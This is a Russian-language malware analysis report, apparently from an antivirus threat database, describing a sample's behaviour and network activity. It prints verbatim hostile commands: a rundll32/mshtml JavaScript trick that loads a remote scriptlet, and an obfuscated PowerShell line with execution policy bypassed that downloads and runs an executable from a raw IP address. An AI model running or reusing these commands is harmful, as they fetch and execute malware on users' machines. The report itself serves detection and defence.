Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- https://84.16.248.175/downloads/microsoft.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\rundll32.exe' JavaSCRiPt:"\..\msHtmL,RunHTMLApplication ";document.write();GetObject('sCRiPT:http://84.##.248.175/downloads/runme');
Сетевая активность
Подключается к
- '84.##.248.175':443
TCP
Запросы HTTP GET
- http://84.##.248.175/downloads/runme
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\rundll32.exe' JavaSCRiPt:"\..\msHtmL,RunHTMLApplication ";document.write();GetObject('sCRiPT:http://84.##.248.175/downloads/runme');' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/C powersHeLL.exE -ex bYpaSs -nop -W 1 seT-contenT -vA ( NEw-obJeCT NET.wEbcliENT ).dOwNlOADdaTa( 'https://84.16.248.175/downloads/Microsoft.exe' ) -en BYte -Pa...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' "/C powersHeLL.exE -ex bYpaSs -nop -W 1 seT-contenT -vA ( NEw-obJeCT NET.wEbcliENT ).dOwNlOADdaTa( 'https://84.16.248.175/downloads/Microsoft.exe' ) -en BYte -Pa...
